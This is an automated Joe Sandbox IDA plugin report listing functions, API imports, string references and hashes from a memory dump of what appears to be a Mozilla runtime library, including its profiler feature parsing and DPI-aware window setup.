Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: __aulldiv__aullrem
String ID: -Infinity$NaN
API String ID: 3839614884-2141177498
Opcode ID: 21a65f7a866fa2667de0635a79a97d547c177c83f3e04dd9208901693037bd90
Instruction ID: cec4c0ba687317817b06540f2b3d32a47266ace032b3340d36d16366b67eb18d
Opcode Fuzzy Hash: 21a65f7a866fa2667de0635a79a97d547c177c83f3e04dd9208901693037bd90
Instruction Fuzzy Hash: FDC1DE31E043188BDB14CFA8C8907DEB7B6FF85318F544529D40ABBB81DB70A959CB99

Function 6C65D4E0 Relevance: 10.8, Strings: 8, Instructions: 805COMMON

Download Yara Rule

Strings

9, xrefs: 6C65DE7F
@, xrefs: 6C65DAF6
8, xrefs: 6C65DC08
0, xrefs: 6C65D852
0, xrefs: 6C65DC7F
-, xrefs: 6C65D7DD
1, xrefs: 6C65DBDD
, xrefs: 6C65DA88

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID:
String ID: $-$0$0$1$8$9$@
API String ID: 0-3654031807
Opcode ID: f7c7fb8722b8d40fa9d8c16e59a2d3bee432b4aa4bab75384451ff90da6f604b
Instruction ID: 0aa39ac45e123d66a3a14887cae5e2a87215a2a65c9adc49dc6c57d26949dd6f
Opcode Fuzzy Hash: f7c7fb8722b8d40fa9d8c16e59a2d3bee432b4aa4bab75384451ff90da6f604b
Instruction Fuzzy Hash: A262CF7060C3458FD701CF19C69079ABBF2AF86358FB84A0DE4D54BAD1C33599A5CB8A

Function 6C6C545C Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 305COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 6C6C8A4B

Strings

~qel, xrefs: 6C6C56C7, 6C6C5703, 6C6C5740, 6C6C9459, 6C6C921F, 6C6C9269, 6C6C948F

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: memset
String ID: ~qel
API String ID: 2221118986-2736371781
Opcode ID: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
Instruction ID: 01af520261224d43aa745bc0de72f0653f0550fdd9b9ffcc5ee0159283b6d2d5
Opcode Fuzzy Hash: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
Instruction Fuzzy Hash: 0BB1F772F0021A8FDB24CF68CC907E9B7B2EF85318F1802AAC549DB791D7349985CB95

Function 6C6C542B Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 287COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 6C6C88F0
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C6C925C

Strings

~qel, xrefs: 6C6C56C7, 6C6C5703, 6C6C5740, 6C6C9459, 6C6C921F, 6C6C9269, 6C6C948F

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: memset
String ID: ~qel
API String ID: 2221118986-2736371781
Opcode ID: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
Instruction ID: 847e3582a78b901618d98ce7101b713317aa8019d6372db2b3185b55660006ee
Opcode Fuzzy Hash: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
Instruction Fuzzy Hash: ABB1E572F0420A8BCB14CE58CC816EDB7B2EF85314F14426AC949DB795D734A989CB95

Function 6C65BEF0 Relevance: 8.2, APIs: 5, Instructions: 652COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6C65C1CB
__aulldiv.LIBCMT ref: 6C65C24C
__aulldiv.LIBCMT ref: 6C65C348
__aullrem.LIBCMT ref: 6C65C365
__aulldiv.LIBCMT ref: 6C65C37D

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: __aulldiv$__aullrem
String ID:
API String ID: 2022606265-0
Opcode ID: f56df46d33552dd8100cae53d24ae323fb4832d86786e5cbb4b774b0e277ade9
Instruction ID: ca4ed2d6a03da8a3f704beac6cc95ae7f98496a33d9bce822fe9f562690d7ed6
Opcode Fuzzy Hash: f56df46d33552dd8100cae53d24ae323fb4832d86786e5cbb4b774b0e277ade9
Instruction Fuzzy Hash: 18323632B046119FC718DE2CC89065ABBE6AFC9310F59866DE896CB395D730ED15CB90

Function 6C696CF0 Relevance: 4.7, APIs: 3, Instructions: 231COMMON

Download Yara Rule

APIs

InitializeConditionVariable.KERNEL32(?), ref: 6C696D45
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C696E1E

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ConditionExclusiveInitializeLockReleaseVariable
String ID:
API String ID: 4169067295-0
Opcode ID: ba068df2cbb1ff551d94e21bc760f8014598e75bcf2a8839709e9f76211d8ed1
Instruction ID: cef72b3a95c0d67210e09b72d9d8342b2118f061bfe39851605f90312853d60d
Opcode Fuzzy Hash: ba068df2cbb1ff551d94e21bc760f8014598e75bcf2a8839709e9f76211d8ed1
Instruction Fuzzy Hash: 2BA17E706183818FC755CF25C490BAEFBE2BF89308F44495DE48A87751DB70E949CB96

Function 6C674640 Relevance: 4.3, APIs: 1, Strings: 1, Instructions: 1251memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 6C674777

Strings

MOZ_RELEASE_ASSERT(mNode), xrefs: 6C675585, 6C6755A8, 6C6755C3, 6C675624

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: AllocVirtual
String ID: MOZ_RELEASE_ASSERT(mNode)
API String ID: 4275171209-1351931279
Opcode ID: 4792eabb66932662e5599aae4cedfd217326090fa2d9b3d2c5bb024516887474
Instruction ID: e152d09da89ed65f54dddbc3e1f9f5dc8f98e24aebc063a76cc89704db909104
Opcode Fuzzy Hash: 4792eabb66932662e5599aae4cedfd217326090fa2d9b3d2c5bb024516887474
Instruction Fuzzy Hash: 58B2DE71A057018FD328CF18C584725FBE2BFC5324B29CBADE4698B6A5D771E841CB98

Function 6C6B85F0 Relevance: 3.6, APIs: 2, Instructions: 619COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6C6B8C7C
__aulldiv.LIBCMT ref: 6C6B8DD7

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: __aulldiv
String ID:
API String ID: 3732870572-0
Opcode ID: db5f37eeb5151a0c79d842b80d44bf315513e08190c289969ce06011ea5de0b8
Instruction ID: 814de8cf06003e87ebb2477e944c0d94209f8b6e29ef4fbe5db3ef8435c7af2b
Opcode Fuzzy Hash: db5f37eeb5151a0c79d842b80d44bf315513e08190c289969ce06011ea5de0b8
Instruction Fuzzy Hash: D5328F71F0011A8BDF18CE9CC8A17AEB7B2FB8C304F15853AD506BB7A0DA349D558B95

Function 6C6C76E3 Relevance: 1.8, Strings: 1, Instructions: 540COMMON

Download Yara Rule

Strings

~qel, xrefs: 6C6C7E0B, 6C6C7B0B, 6C6C793C, 6C6C7796, 6C6C79FB, 6C6C79C0

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID:
String ID: ~qel
API String ID: 0-2736371781
Opcode ID: 72fe09860ade046fc3bdcfcdda7f36b59b22c90a724c00f6b1989c1cc893ef4e
Instruction ID: c3f351375ce2f0f9a3e522e778f1118c83f9cb449e28e628ffd06b8ba48e099a
Opcode Fuzzy Hash: 72fe09860ade046fc3bdcfcdda7f36b59b22c90a724c00f6b1989c1cc893ef4e
Instruction Fuzzy Hash: AF320971E006198FCB14CF98C890AADFBF2FF88308F54816AC559A7745D731A986CF95

Function 6C6C6E63 Relevance: 1.7, Strings: 1, Instructions: 498COMMON

Download Yara Rule

Strings

~qel, xrefs: 6C6C7E0B, 6C6C7B0B, 6C6C793C, 6C6C79FB, 6C6C7C72, 6C6C7C03, 6C6C79C0

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID:
String ID: ~qel
API String ID: 0-2736371781
Opcode ID: a22d295006b0cf76062ece48329bf5a81d073d80eca1d8f36db09750ec8a7875
Instruction ID: 3be4a28f322a9970853bb3041ef7813f79d8eca11099a4da24d4568498a361c3
Opcode Fuzzy Hash: a22d295006b0cf76062ece48329bf5a81d073d80eca1d8f36db09750ec8a7875
Instruction Fuzzy Hash: F822E771E006198FCB14CF98C880AADF7F2FF89304F6485AAC949A7745D731A986CF95

Function 6C695C10 Relevance: 1.6, APIs: 1, Instructions: 333COMMON

Download Yara Rule

APIs

memcmp.VCRUNTIME140(?,?,6C664A63,?,?), ref: 6C695F06

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: memcmp
String ID:
API String ID: 1475443563-0
Opcode ID: 1913865122f404812779f936fc1b3168496d64710720d4fcf55dc420e8726b74
Instruction ID: 4e78ddb84189f0b869c18d016eff578674f1ff09ffa21a39c9186e2f069ba6a1
Opcode Fuzzy Hash: 1913865122f404812779f936fc1b3168496d64710720d4fcf55dc420e8726b74
Instruction Fuzzy Hash: 5FC1C275D0120A8BCB04CFA5D5906EEBBF2FF8A319F28425DD8556BB44D732A806CF94

Function 6C680512 Relevance: .5, Instructions: 466COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 732f8aafec1c0d410ff216b27f2e5c03b4339b09f163d0f101acbef2ddceab04
Instruction ID: 3e2dc702d0882207978e665154e5a8ef5aaab46da424cb116f28f689c6641572
Opcode Fuzzy Hash: 732f8aafec1c0d410ff216b27f2e5c03b4339b09f163d0f101acbef2ddceab04
Instruction Fuzzy Hash: 72223771E05619CFCB24CF98C890AADF7B2FF89308F548699C54AA7705D730A986CF94

Function 6C6CAC00 Relevance: .4, Instructions: 445COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32b0648d1147d7e88448044eaa04edfa097c69572b65d1b73d01dcb8599e7971
Instruction ID: c26b37ba736ff65f4445e7514a68d184ead88ba06c877f9f6937d7afe7b65eb5
Opcode Fuzzy Hash: 32b0648d1147d7e88448044eaa04edfa097c69572b65d1b73d01dcb8599e7971
Instruction Fuzzy Hash: 8DF13971B087454FD700CE28C8917AAB7E2EFC6318F148A2DE5E487792E774D8898797

Function 6C65C670 Relevance: .3, Instructions: 285COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e0237b6fe6878b5c9d7142c5b0fdb09dfdf9fcc0206538975243e8437b3ed89
Instruction ID: 47d4b005ea0d460a9a087beec7120d377fd57c6bf0f934b183e120b1cd954d5e
Opcode Fuzzy Hash: 4e0237b6fe6878b5c9d7142c5b0fdb09dfdf9fcc0206538975243e8437b3ed89
Instruction Fuzzy Hash: 16A1AF71F0021A9FDB08CE68C8913AEB7F2AFC9354F588129D916E7781DB349D168B90

Function 6C6B55F0 Relevance: 77.2, APIs: 22, Strings: 22, Instructions: 163libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(user32,?,6C68E1A5), ref: 6C6B5606
LoadLibraryW.KERNEL32(gdi32,?,6C68E1A5), ref: 6C6B560F
GetProcAddress.KERNEL32(00000000,GetThreadDpiAwarenessContext), ref: 6C6B5633
GetProcAddress.KERNEL32(00000000,AreDpiAwarenessContextsEqual), ref: 6C6B563D
GetProcAddress.KERNEL32(00000000,EnableNonClientDpiScaling), ref: 6C6B566C
GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 6C6B567D
GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 6C6B5696
GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 6C6B56B2
GetProcAddress.KERNEL32(00000000,CreateWindowExW), ref: 6C6B56CB
GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 6C6B56E4
GetProcAddress.KERNEL32(00000000,SetWindowPos), ref: 6C6B56FD
GetProcAddress.KERNEL32(00000000,GetWindowDC), ref: 6C6B5716
GetProcAddress.KERNEL32(00000000,FillRect), ref: 6C6B572F
GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 6C6B5748
GetProcAddress.KERNEL32(00000000,LoadIconW), ref: 6C6B5761
GetProcAddress.KERNEL32(00000000,LoadCursorW), ref: 6C6B577A
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6C6B5793
GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 6C6B57A8
GetProcAddress.KERNEL32(00000000,SetWindowLongPtrW), ref: 6C6B57BD
GetProcAddress.KERNEL32(?,StretchDIBits), ref: 6C6B57D5
GetProcAddress.KERNEL32(?,CreateSolidBrush), ref: 6C6B57EA
GetProcAddress.KERNEL32(?,DeleteObject), ref: 6C6B57FF

Strings

GetMonitorInfoW, xrefs: 6C6B57A2
StretchDIBits, xrefs: 6C6B57CC
GetDpiForWindow, xrefs: 6C6B5690
SetWindowPos, xrefs: 6C6B56F7
DeleteObject, xrefs: 6C6B57F9
ShowWindow, xrefs: 6C6B56DE
AreDpiAwarenessContextsEqual, xrefs: 6C6B5637
RegisterClassW, xrefs: 6C6B56AC
user32, xrefs: 6C6B5601
GetThreadDpiAwarenessContext, xrefs: 6C6B562D
ReleaseDC, xrefs: 6C6B5742
LoadIconW, xrefs: 6C6B575B
CreateSolidBrush, xrefs: 6C6B57E4
MonitorFromWindow, xrefs: 6C6B578D
CreateWindowExW, xrefs: 6C6B56C5
FillRect, xrefs: 6C6B5729
GetSystemMetricsForDpi, xrefs: 6C6B5677
SetWindowLongPtrW, xrefs: 6C6B57B7
GetWindowDC, xrefs: 6C6B5710
LoadCursorW, xrefs: 6C6B5774
gdi32, xrefs: 6C6B560A
EnableNonClientDpiScaling, xrefs: 6C6B5666

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: AreDpiAwarenessContextsEqual$CreateSolidBrush$CreateWindowExW$DeleteObject$EnableNonClientDpiScaling$FillRect$GetDpiForWindow$GetMonitorInfoW$GetSystemMetricsForDpi$GetThreadDpiAwarenessContext$GetWindowDC$LoadCursorW$LoadIconW$MonitorFromWindow$RegisterClassW$ReleaseDC$SetWindowLongPtrW$SetWindowPos$ShowWindow$StretchDIBits$gdi32$user32
API String ID: 2238633743-1964193996
Opcode ID: 94b76636f99ffd07114a4f151aec59dcb6d2598d60fa7d4b3905766af542c8f8
Instruction ID: b3b9cb022db72f0e9f9477c7989f80cbda05744432ed32d297e3daa30a732aad
Opcode Fuzzy Hash: 94b76636f99ffd07114a4f151aec59dcb6d2598d60fa7d4b3905766af542c8f8
Instruction Fuzzy Hash: 965169707113235BDB009F36CD84A663AF8AB4A785F114925AA21F3A55EFB0F811CF6D

Function 6C69CC00 Relevance: 73.7, APIs: 25, Strings: 24, Instructions: 233stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default,?,6C66582D), ref: 6C69CC27
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java,?,?,?,6C66582D), ref: 6C69CC3D
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6C6CFE98,?,?,?,?,?,6C66582D), ref: 6C69CC56
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf,?,?,?,?,?,?,?,6C66582D), ref: 6C69CC6C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio,?,?,?,?,?,?,?,?,?,6C66582D), ref: 6C69CC82
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio,?,?,?,?,?,?,?,?,?,?,?,6C66582D), ref: 6C69CC98
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall,?,?,?,?,?,?,?,?,?,?,?,?,?,6C66582D), ref: 6C69CCAE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6C69CCC4
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6C69CCDA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6C69CCEC
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6C69CCFE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6C69CD14
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6C69CD82
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6C69CD98
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6C69CDAE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6C69CDC4
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6C69CDDA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6C69CDF0
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6C69CE06
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6C69CE1C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6C69CE32
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6C69CE48
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6C69CE5E
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6C69CE74
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6C69CE8A

Strings

fileio, xrefs: 6C69CC92
noiostacks, xrefs: 6C69CCBE
stackwalk, xrefs: 6C69CCF8
processcpu, xrefs: 6C69CE6E
audiocallbacktracing, xrefs: 6C69CDD4
nostacksampling, xrefs: 6C69CD7C
nativeallocations, xrefs: 6C69CDA8
markersallthreads, xrefs: 6C69CE42
fileioall, xrefs: 6C69CCA8
unregisteredthreads, xrefs: 6C69CE58
mainthreadio, xrefs: 6C69CC7C
cpuallthreads, xrefs: 6C69CE16
preferencereads, xrefs: 6C69CD92
samplingallthreads, xrefs: 6C69CE2C
default, xrefs: 6C69CC21
seqstyle, xrefs: 6C69CCE6
Unrecognized feature "%s"., xrefs: 6C69CEA0
screenshots, xrefs: 6C69CCD4
jsallocations, xrefs: 6C69CD0E
java, xrefs: 6C69CC37
ipcmessages, xrefs: 6C69CDBE
leaf, xrefs: 6C69CC66
notimerresolutionchange, xrefs: 6C69CE00
power, xrefs: 6C69CE84

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: strcmp
String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
API String ID: 1004003707-2809817890
Opcode ID: 602cefd0f958e7c68f7242adeed9a91ecb3ecbc503f71a6bb229bb2c15ae9e18
Instruction ID: 86e23dd8be6c638818287a695d03abbef18e979f159a2decd0edf4e43f665e4b
Opcode Fuzzy Hash: 602cefd0f958e7c68f7242adeed9a91ecb3ecbc503f71a6bb229bb2c15ae9e18
Instruction Fuzzy Hash: D05142D1B4562772FA0531156D20BEA1485EF5334AF14443AEE1BA2E90FB05E70FCAAF

Function 6C664470 Relevance: 45.7, APIs: 20, Strings: 6, Instructions: 178libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C664730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C6644B2,6C6DE21C,6C6DF7F8), ref: 6C66473E
Part of subcall function 6C664730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C66474A

GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6C6644BA
LoadLibraryW.KERNEL32(kernel32.dll), ref: 6C6644D2
InitOnceExecuteOnce.KERNEL32(6C6DF80C,6C65F240,?,?), ref: 6C66451A
GetModuleHandleW.KERNEL32(user32.dll), ref: 6C66455C
LoadLibraryW.KERNEL32(?), ref: 6C664592
InitializeCriticalSection.KERNEL32(6C6DF770), ref: 6C6645A2
moz_xmalloc.MOZGLUE(00000008), ref: 6C6645AA
moz_xmalloc.MOZGLUE(00000018), ref: 6C6645BB
